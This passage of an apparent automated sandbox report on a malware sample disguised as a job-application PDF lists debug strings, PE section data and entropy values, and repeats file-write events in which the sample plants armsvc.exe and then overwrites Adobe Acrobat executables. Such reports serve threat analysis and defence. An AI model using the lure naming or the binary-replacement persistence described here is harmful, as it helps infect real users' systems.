            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7EFPjTEjLAB4.exe, 00000017.00000000.1273207364.000000000071F000.00000002.00000001.01000000.00000007.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2410736360.000000000071F000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.1721195083.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdb source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
            Source: Binary string: ALG.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
            Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
            Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp
            Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: real checksum: 0x1fb4b should be: 0x15c0e1
            Source: armsvc.exe.0.drStatic PE information: section name: .didat
            Source: alg.exe.0.drStatic PE information: section name: .didat
            Source: plugin-container.exe.1.drStatic PE information: section name: .00cfg
            Source: plugin-container.exe.1.drStatic PE information: section name: .voltbl
            Source: private_browsing.exe.1.drStatic PE information: section name: .00cfg
            Source: private_browsing.exe.1.drStatic PE information: section name: .voltbl
            Source: updater.exe.1.drStatic PE information: section name: .00cfg
            Source: updater.exe.1.drStatic PE information: section name: .voltbl
            Source: updater.exe.1.drStatic PE information: section name: _RDATA
            Source: updater.exe0.1.drStatic PE information: section name: CPADinfo
            Source: updater.exe0.1.drStatic PE information: section name: malloc_h
            Source: elevation_service.exe.1.drStatic PE information: section name: .00cfg
            Source: elevation_service.exe.1.drStatic PE information: section name: .gxfg
            Source: elevation_service.exe.1.drStatic PE information: section name: .retplne
            Source: elevation_service.exe.1.drStatic PE information: section name: _RDATA
            Source: elevation_service.exe.1.drStatic PE information: section name: malloc_h
            Source: maintenanceservice.exe.1.drStatic PE information: section name: .00cfg
            Source: maintenanceservice.exe.1.drStatic PE information: section name: .voltbl
            Source: maintenanceservice.exe.1.drStatic PE information: section name: _RDATA
            Source: msdtc.exe.1.drStatic PE information: section name: .didat
            Source: msiexec.exe.1.drStatic PE information: section name: .didat
            Source: unpack200.exe.1.drStatic PE information: section name: .00cfg
            Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: .00cfg
            Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: .gxfg
            Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: .retplne
            Source: ie_to_edge_stub.exe.1.drStatic PE information: section name: _RDATA
            Source: cookie_exporter.exe.1.drStatic PE information: section name: .00cfg
            Source: cookie_exporter.exe.1.drStatic PE information: section name: .gxfg
            Source: cookie_exporter.exe.1.drStatic PE information: section name: .retplne
            Source: cookie_exporter.exe.1.drStatic PE information: section name: _RDATA
            Source: FXSSVC.exe.1.drStatic PE information: section name: .didat
            Source: identity_helper.exe.1.drStatic PE information: section name: .00cfg
            Source: identity_helper.exe.1.drStatic PE information: section name: .gxfg
            Source: identity_helper.exe.1.drStatic PE information: section name: .retplne
            Source: identity_helper.exe.1.drStatic PE information: section name: _RDATA
            Source: identity_helper.exe.1.drStatic PE information: section name: malloc_h
            Source: elevation_service.exe0.1.drStatic PE information: section name: .gxfg
            Source: elevation_service.exe0.1.drStatic PE information: section name: .retplne
            Source: elevation_service.exe0.1.drStatic PE information: section name: _RDATA
            Source: MsSense.exe.1.drStatic PE information: section name: .didat
            Source: Spectrum.exe.1.drStatic PE information: section name: .didat
            Source: TieringEngineService.exe.1.drStatic PE information: section name: .didat
            Source: vds.exe.1.drStatic PE information: section name: .didat
            Source: VSSVC.exe.1.drStatic PE information: section name: .didat
            Source: setup.exe.1.drStatic PE information: section name: .00cfg
            Source: setup.exe.1.drStatic PE information: section name: .gxfg
            Source: setup.exe.1.drStatic PE information: section name: .retplne
            Source: setup.exe.1.drStatic PE information: section name: LZMADEC
            Source: setup.exe.1.drStatic PE information: section name: _RDATA
            Source: setup.exe.1.drStatic PE information: section name: malloc_h
            Source: msedgewebview2.exe.1.drStatic PE information: section name: .00cfg
            Source: msedgewebview2.exe.1.drStatic PE information: section name: .gxfg
            Source: msedgewebview2.exe.1.drStatic PE information: section name: .retplne
            Source: msedgewebview2.exe.1.drStatic PE information: section name: CPADinfo
            Source: msedgewebview2.exe.1.drStatic PE information: section name: LZMADEC
            Source: msedgewebview2.exe.1.drStatic PE information: section name: _RDATA
            Source: msedgewebview2.exe.1.drStatic PE information: section name: malloc_h
            Source: msedge_proxy.exe.1.drStatic PE information: section name: .00cfg
            Source: msedge_proxy.exe.1.drStatic PE information: section name: .gxfg
            Source: msedge_proxy.exe.1.drStatic PE information: section name: .retplne
            Source: msedge_proxy.exe.1.drStatic PE information: section name: _RDATA
            Source: msedge_proxy.exe.1.drStatic PE information: section name: malloc_h
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: .00cfg
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: .gxfg
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: .retplne
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: LZMADEC
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: _RDATA
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: malloc_h
            Source: notification_click_helper.exe.1.drStatic PE information: section name: .00cfg
            Source: notification_click_helper.exe.1.drStatic PE information: section name: .gxfg
            Source: notification_click_helper.exe.1.drStatic PE information: section name: .retplne
            Source: notification_click_helper.exe.1.drStatic PE information: section name: CPADinfo
            Source: notification_click_helper.exe.1.drStatic PE information: section name: _RDATA
            Source: notification_click_helper.exe.1.drStatic PE information: section name: malloc_h
            Source: pwahelper.exe.1.drStatic PE information: section name: .00cfg
            Source: pwahelper.exe.1.drStatic PE information: section name: .gxfg
            Source: pwahelper.exe.1.drStatic PE information: section name: .retplne
            Source: pwahelper.exe.1.drStatic PE information: section name: _RDATA
            Source: pwahelper.exe.1.drStatic PE information: section name: malloc_h
            Source: msedge_proxy.exe0.1.drStatic PE information: section name: .00cfg
            Source: msedge_proxy.exe0.1.drStatic PE information: section name: .gxfg
            Source: msedge_proxy.exe0.1.drStatic PE information: section name: .retplne
            Source: msedge_proxy.exe0.1.drStatic PE information: section name: _RDATA
            Source: msedge_proxy.exe0.1.drStatic PE information: section name: malloc_h
            Source: pwahelper.exe0.1.drStatic PE information: section name: .00cfg
            Source: pwahelper.exe0.1.drStatic PE information: section name: .gxfg
            Source: pwahelper.exe0.1.drStatic PE information: section name: .retplne
            Source: pwahelper.exe0.1.drStatic PE information: section name: _RDATA
            Source: pwahelper.exe0.1.drStatic PE information: section name: malloc_h
            Source: WmiApSrv.exe.1.drStatic PE information: section name: .didat
            Source: wmpnetwk.exe.1.drStatic PE information: section name: .didat
            Source: SearchIndexer.exe.1.drStatic PE information: section name: .didat
            Source: AppVLP.exe.1.drStatic PE information: section name: .c2r
            Source: OneDriveSetup.exe.1.drStatic PE information: section name: .didat
            Source: AppSharingHookController.exe.1.drStatic PE information: section name: .c2r
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00412119 push eax; iretd 3_2_00412120
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D9F4 push esp; retf 3_2_0040D9FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00403450 push eax; ret 3_2_00403452
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040D426 push edx; iretd 3_2_0040D427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00401D66 pushad ; ret 3_2_00401D6A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041ADD7 push cs; iretd 3_2_0041ADDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00405F6E push es; retf 3_2_00405F6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00414F26 push esp; ret 3_2_00414F27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A0225F pushad ; ret 3_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A027FA pushad ; ret 3_2_03A027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A309AD push ecx; mov dword ptr [esp], ecx3_2_03A309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A0283D push eax; iretd 3_2_03A02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A01366 push eax; iretd 3_2_03A01369
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: section name: .reloc entropy: 7.920482468502862
            Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.9235618227654845
            Source: Aut2exe.exe.1.drStatic PE information: section name: .rsrc entropy: 7.796129962781083
            Source: Aut2exe_x64.exe.1.drStatic PE information: section name: .rsrc entropy: 7.796261129116976
            Source: AutoIt3_x64.exe.1.drStatic PE information: section name: .reloc entropy: 7.9318951505469855
            Source: SciTE.exe.1.drStatic PE information: section name: .reloc entropy: 7.902695414552209
            Source: updater.exe0.1.drStatic PE information: section name: .reloc entropy: 7.870921342277131
            Source: elevation_service.exe.1.drStatic PE information: section name: .reloc entropy: 7.933966591011752
            Source: FXSSVC.exe.1.drStatic PE information: section name: .reloc entropy: 7.930067896898165
            Source: identity_helper.exe.1.drStatic PE information: section name: .reloc entropy: 7.928251921274259
            Source: elevation_service.exe0.1.drStatic PE information: section name: .reloc entropy: 7.932982513156327
            Source: SensorDataService.exe.1.drStatic PE information: section name: .reloc entropy: 7.922528567440854
            Source: Spectrum.exe.1.drStatic PE information: section name: .reloc entropy: 7.933293021524294
            Source: AgentService.exe.1.drStatic PE information: section name: .reloc entropy: 7.924379510937129
            Source: vds.exe.1.drStatic PE information: section name: .reloc entropy: 7.928798198147862
            Source: VSSVC.exe.1.drStatic PE information: section name: .reloc entropy: 7.927155017571518
            Source: setup.exe.1.drStatic PE information: section name: .reloc entropy: 7.932286203155099
            Source: msedgewebview2.exe.1.drStatic PE information: section name: .reloc entropy: 7.923553755278431
            Source: msedge_proxy.exe.1.drStatic PE information: section name: .reloc entropy: 7.929871214304746
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: section name: .reloc entropy: 7.934262006495079
            Source: notification_click_helper.exe.1.drStatic PE information: section name: .reloc entropy: 7.931778469311022
            Source: pwahelper.exe.1.drStatic PE information: section name: .reloc entropy: 7.928413847878667
            Source: msedge_proxy.exe0.1.drStatic PE information: section name: .reloc entropy: 7.929866883559881
            Source: pwahelper.exe0.1.drStatic PE information: section name: .reloc entropy: 7.928415240795317
            Source: wbengine.exe.1.drStatic PE information: section name: .reloc entropy: 7.9290214501884195
            Source: wmpnetwk.exe.1.drStatic PE information: section name: .reloc entropy: 7.934810669423257
            Source: SearchIndexer.exe.1.drStatic PE information: section name: .reloc entropy: 7.933782405445589
            Source: 7zFM.exe.1.drStatic PE information: section name: .reloc entropy: 7.919203766013738
            Source: 7zG.exe.1.drStatic PE information: section name: .reloc entropy: 7.914539216942372
            Source: OneDriveSetup.exe.1.drStatic PE information: section name: .reloc entropy: 7.85914217778932
            Source: Integrator.exe.1.drStatic PE information: section name: .reloc entropy: 7.75701428167723

            Persistence and Installation Behavior

            barindex
            Drops executable to a common third party application directory
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
